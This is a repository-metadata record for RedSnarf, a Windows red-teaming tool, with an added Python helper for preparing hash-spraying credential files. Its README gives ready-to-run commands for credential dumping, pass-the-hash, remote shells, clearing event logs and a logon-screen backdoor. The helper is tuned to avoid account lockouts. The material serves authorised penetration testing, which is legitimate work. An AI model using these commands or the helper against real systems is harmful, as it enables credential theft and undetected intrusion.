{"id":13843381,"url":"https://github.com/nccgroup/redsnarf","last_synced_at":"2025-05-16T14:05:29.005Z","repository":{"id":41497672,"uuid":"72521497","full_name":"nccgroup/redsnarf","owner":"nccgroup","description":"RedSnarf is a pen-testing / red-teaming tool for Windows environments","archived":false,"fork":false,"pushed_at":"2020-09-14T12:31:11.000Z","size":14251,"stargazers_count":1213,"open_issues_count":5,"forks_count":239,"subscribers_count":80,"default_branch":"master","last_synced_at":"2025-04-19T15:56:36.811Z","etag":null,"topics":["active-directory","pentesting","pentesting-windows","python","windows"],"latest_commit_sha":null,"homepage":"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/november/introducing-redsnarf-and-the-importance-of-being-careful/","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nccgroup.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-11-01T09:21:23.000Z","updated_at":"2025-04-19T02:56:18.000Z","dependencies_parsed_at":"2022-09-05T04:21:22.944Z","dependency_job_id":null,"html_url":"https://github.com/nccgroup/redsnarf","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nccgroup%2Fredsnarf","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nccgroup%2Fredsnarf/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nccgroup%2Fredsnarf/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nccgroup%2Fredsnarf/manifests","owner_url":"http
s://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nccgroup","download_url":"https://codeload.github.com/nccgroup/redsnarf/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254544146,"owners_count":22088807,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["active-directory","pentesting","pentesting-windows","python","windows"],"created_at":"2024-08-04T17:02:03.904Z","updated_at":"2025-05-16T14:05:23.995Z","avatar_url":"https://github.com/nccgroup.png","language":"PowerShell","funding_links":[],"categories":["Windows Utilities","PowerShell","PowerShell (153)","Tools","Operating Systems"],"sub_categories":["Web Exploitation Books","Windows Utilities","Windows","Penetration Testing Report Templates"],"readme":"```\r\n    ______           .____________                     _____  \r\n\\______   \\ ____   __| _/   _____/ ____ _____ ________/ ____\\ \r\n |       _// __ \\ / __ |\\_____  \\ /    \\\\__  \\\\_  __ \\   __\\  \r\n |    |   \\  ___// /_/ |/        \\   |  \\/ __ \\|  | \\/|  |    \r\n |____|_  /\\___  \u003e____ /_______  /___|  (____  /__|   |__|    \r\n        \\/     \\/     \\/       \\/     \\/     \\/         \r\n                                  redsnarf.ff0000@gmail.com\r\n                                                  @redsnarf\r\n```\r\n\r\n[![GitHub license](https://img.shields.io/hexpm/l/plug.svg)](https://github.com/nccgroup/redsnarf/blob/master/LICENSE.md)\r\n\r\n**RedSnarf** is a pen-testing / red-teaming tool by **Ed Williams** for retrieving hashes and credentials from Windows 
\r\nworkstations, servers and domain controllers using OpSec Safe Techniques.\r\n\r\nSee our YouTube Channel for Videos\r\nhttps://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ\r\n\r\nRedSnarf functionality includes: \r\n\r\n•   Retrieval of local SAM hashes  \r\n•   Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password;  \r\n•   Retrieval of MS cached credentials;  \r\n•   Pass-the-hash;  \r\n•   Quickly identify weak and guessable username/password combinations (default of administrator/Password01);  \r\n•   The ability to retrieve hashes across a range;  \r\n•   Hash spraying -  \r\n    Credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space;  \r\n•\tLsass dump for offline analysis with Mimikatz;  \r\n•\tDumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing;  \r\n•\tDumping of Domain controller hashes using the drsuapi method;  \r\n•\tRetrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator';  \r\n•\tAbility to decrypt cpassword hashes;  \r\n•\tAbility to start a shell on a remote machine;  \r\n•\tThe ability to clear the event logs (application, security, setup or system); (Internal Version only)  \r\n•\tResults are saved on a per-host basis for analysis.  \r\n•\tEnable/Disable RDP on a remote machine.  \r\n•\tChange RDP port from 3389 to 443 on a remote machine.  \r\n•\tEnable/Disable NLA on a remote machine.  \r\n•\tFind where users are logged in on remote machines.  \r\n•\tBackdoor Windows Logon Screen  \r\n•\tEnable/Disable UAC on a remote machine.  \r\n•\tStealth mimikatz added.  
\r\n•\tParsing of domain hashes  \r\n•\tAbility to determine which accounts are enabled/disabled  \r\n•\tTake a screenshot of a remotely logged-on active user's desktop  \r\n•\tRecord a remotely logged-on active user's desktop  \r\n•\tDecrypt Windows CPassword  \r\n•\tDecrypt WinSCP Password  \r\n•\tGet user SPNs  \r\n•\tRetrieve Wi-Fi passwords from remote machines  \r\n\r\nRedSnarf Usage\r\n=======================\r\n\r\n**Requirements:**  \r\nImpacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git  \r\nCredDump7 - https://github.com/Neohapsis/creddump7  \r\nLsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx  \r\nNetaddr (0.7.12) - pip install netaddr  \r\nTermcolor (1.1.0) - pip install termcolor  \r\niconv - used when parsing Mimikatz output locally  \r\n\r\n**Show Help**  \r\n./redsnarf.py -h  \r\n./redsnarf.py --help  \r\n\r\nRetrieve Local Hashes\r\n=======================\r\n\r\nRetrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log  \r\n**./redsnarf.py -H ip=10.0.0.50 -uC security**\r\n\r\nRetrieve Local Hashes from a single machine using weak local credentials and clearing the Application event log  \r\n**./redsnarf.py -H ip=10.0.0.50 -uC application**\r\n\r\nRetrieve Local Hashes from a single machine using local administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .**\r\n\r\nRetrieve Local Hashes from a single machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com**\r\n\r\nRetrieve Hashes across a network range using local administrator credentials  \r\n**./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .**\r\n\r\nRetrieve Hashes across a network range using domain administrator credentials  \r\n**./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com**\r\n\r\nRetrieve Hashes from a list of targets read from a file using domain administrator credentials  \r\n**./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com**\r\n\r\nHash Spraying\r\n=======================\r\n\r\nSpray Hashes across a network range using local logins  \r\n**./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .**\r\n\r\nSpray Hashes across a network range using a domain login  \r\n**./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com**\r\n\r\nQuickly Check Credentials  \r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y**\r\n\r\nQuickly Check a File containing usernames (-hS) against a single generic password (-hP)  \r\n**./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y**\r\n\r\nRetrieve Domain Hashes\r\n=======================\r\n\r\nRetrieve Hashes using the drsuapi method (quickest)  \r\nThis method supports an optional flag of -hQ y, which will query LDAP and output whether accounts are enabled or disabled  \r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)**\r\n\r\nRetrieve Hashes using NTDSUtil  \r\nThis method supports an optional flag of -hQ y, which will query LDAP and output whether accounts are enabled or disabled  \r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)**\r\n\r\nGolden Ticket Generation  \r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y**\r\n\r\nInformation Gathering\r\n=======================\r\n\r\nCopy the Policies and Scripts folders from a Domain Controller and parse them for 'password' and 'administrator'  \r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y**\r\n\r\nDecrypt Cpassword  \r\n**./redsnarf.py -uG cpassword**\r\n\r\nFind User - Live  \r\n**./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name**\r\n\r\nFind User - Offline (searches previously downloaded information)  \r\n**./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name**\r\n\r\nDisplay NT AUTHORITY\\SYSTEM Tasklist  \r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y**  \r\n\r\nScreenshot the desktop of a remotely logged-on active user  \r\n**./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y**  \r\n\r\nMisc\r\n=======================\r\n\r\nStart a Shell on a machine using local administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y**\r\n\r\nStart a Shell on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y**\r\n\r\nRetrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y**\r\n\r\nRun stealth Mimikatz. This option starts a web server to serve a PowerShell script that is obfuscated and encoded machine-side; data does not touch disk. Credentials are grepped for and echoed back to the screen in an easy-to-read style.  \r\n**./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y**\r\n\r\nRun Custom Command  \r\nExample 1  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'**\r\n\r\nExample 2 - Double quotes need to be escaped with \\  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name \\\"domain admins\\\" | dsget group -members -expand'**\r\n\r\nLocal Access Token Policy  \r\nCreates a batch file, lat.bat, which you can copy to the remote machine and execute; it modifies the registry to either enable or disable the Local Access Token Policy settings.  
\r\n**./redsnarf.py -rL y**\r\n\r\nWdigest  \r\nEnable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials\r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e**\r\n\r\nDisable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d**\r\n\r\nQuery UseLogonCredential Wdigest registry value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q**\r\n\r\nUAC  \r\nEnable UAC registry value on a machine using domain administrator credentials\r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e**\r\n\r\nDisable UAC registry value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d**\r\n\r\nQuery UAC registry value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q**\r\n\r\nBackdoor - Backdoor Windows Screen - Press Left Shift + Left Alt + Print Screen to activate  \r\nEnable Backdoor registry value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e**\r\n\r\nDisable Backdoor registry value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d**\r\n\r\nQuery Backdoor registry value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q**\r\n\r\nAutoLogon  \r\nEnable Windows AutoLogon registry value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u 
administrator -p Password01 -d yourdomain.com -rA e**\r\n\r\nDisable Windows AutoLogon registry value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d**\r\n\r\nQuery Windows AutoLogon registry value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q**\r\n\r\nLock a remote machine user session using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y**\r\n\r\nRDP\r\n=======================\r\n \r\nEnable RDP on a machine using domain administrator credentials\r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e**\r\n\r\nDisable RDP on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d**\r\n\r\nQuery RDP status on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q**\r\n\r\nChange RDP Port from 3389 to 443 - Change RDP Port to 443 on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e**\r\n\r\nChange RDP Port to default of 3389 on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d**\r\n\r\nQuery RDP Port Value on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q**\r\n\r\nEnable Multi-RDP with Mimikatz  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y**\r\n\r\nEnable RDP SingleSessionPerUser on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u 
administrator -p Password01 -d yourdomain.com -rM e**\r\n\r\nDisable RDP SingleSessionPerUser on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d**\r\n\r\nQuery RDP SingleSessionPerUser status on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q**\r\n\r\nNLA\r\n=======================\r\n\r\nEnable NLA on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e**\r\n\r\nDisable NLA on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d**\r\n\r\nQuery NLA status on a machine using domain administrator credentials  \r\n**./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q**\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnccgroup%2Fredsnarf","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnccgroup%2Fredsnarf","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnccgroup%2Fredsnarf/lists"}
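Worked example for the Hash Spraying section of the README above, which says the credsfile may mix pwdump and fgdump lines with plain text `username password` lines. This is an added example, not RedSnarf's own code and not part of its README: it normalises such a file into (user, NT hash) pairs so every entry, plaintext included, can be sprayed as a hash; de-duplicates entries so each credential costs exactly one logon attempt against account-lockout thresholds; flags pwdump lines that still carry a real LM hash (a weak-configuration finding in itself); and skips entries with no usable NT hash. The pwdump field layout (`user:RID:LM:NT:::`), the empty-LM constant and the NT hash construction (MD4 over UTF-16LE) are standard; MD4 is implemented inline because `hashlib`'s md4 is often unavailable under OpenSSL 3. The names `Cred`, `parse_credsfile` and `nt_hash` are this example's own, and the sample credsfile is constructed for it and contains no real credentials.

```python
"""Normalise a mixed RedSnarf-style credsfile for hash spraying (added example)."""
import re
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field pwdump emits when no LM hash is stored
_HEX32 = re.compile(r"[0-9a-f]{32}")
_MASK = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often absent under OpenSSL 3)."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & _MASK
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    # Padding: 0x80, zeros up to 56 mod 64, then the 64-bit little-endian bit length.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + f(b, c, d) + X[i]) & _MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + X[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, rotl((a + h(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4]), b, c
        A, B, C, D = (A + a) & _MASK, (B + b) & _MASK, (C + c) & _MASK, (D + d) & _MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as lowercase hex."""
    return _md4(password.encode("utf-16-le")).hex()


@dataclass(frozen=True)
class Cred:
    user: str
    nt_hash: str
    source: str                     # "pwdump" or "plaintext"
    password: Optional[str] = None  # only known for plaintext lines
    lm_stored: bool = False         # pwdump line carried a real LM hash (weak config)


def parse_credsfile(text: str) -> Tuple[List[Cred], List[Tuple[int, str]]]:
    """Return (usable, de-duplicated credentials, [(line number, reason) for skipped lines])."""
    creds: List[Cred] = []
    skipped: List[Tuple[int, str]] = []
    seen = set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) >= 7 and parts[1].isdigit():
            # pwdump / fgdump: user:RID:LM:NT:::  (seven colon-separated fields, numeric RID)
            nt = parts[3].lower()
            if not _HEX32.fullmatch(nt):  # e.g. the "NO PASSWORD*****" placeholder
                skipped.append((lineno, "no usable NT hash"))
                continue
            cred = Cred(parts[0], nt, "pwdump", lm_stored=parts[2].lower() != EMPTY_LM)
        else:
            # plain text: "username password"; the password may itself contain spaces
            fields = line.split(None, 1)
            if len(fields) != 2:
                skipped.append((lineno, "unrecognised format"))
                continue
            user, password = fields
            cred = Cred(user, nt_hash(password), "plaintext", password=password)
        key = (cred.user.lower(), cred.nt_hash)  # Windows usernames are case-insensitive
        if key in seen:
            skipped.append((lineno, "duplicate"))
            continue
        seen.add(key)
        creds.append(cred)
    return creds, skipped


# Constructed sample input for this example; none of these are real credentials.
SAMPLE_CREDSFILE = """\
# constructed sample, not real data
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:NO PASSWORD*********************:::
svc_backup:1105:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
administrator Password01
administrator password
YOURDOMAIN\\helpdesk Summer 2020!
"""

if __name__ == "__main__":
    found, dropped = parse_credsfile(SAMPLE_CREDSFILE)
    for c in found:
        print(f"{c.user:22} {c.nt_hash} {c.source:9} LM stored: {c.lm_stored}")
    for n, why in dropped:
        print(f"skipped line {n}: {why}")
```

Run it directly to print the normalised table. The duplicate check matters operationally: the same account appearing as a pwdump line and again as plaintext would otherwise be tried twice per host, and a spray across a /24 with a domain login multiplies every redundant attempt by the number of hosts, which is how a lockout threshold gets hit. A non-empty `lm_stored` flag on any host is worth reporting on its own, since LM hashes are trivially cracked.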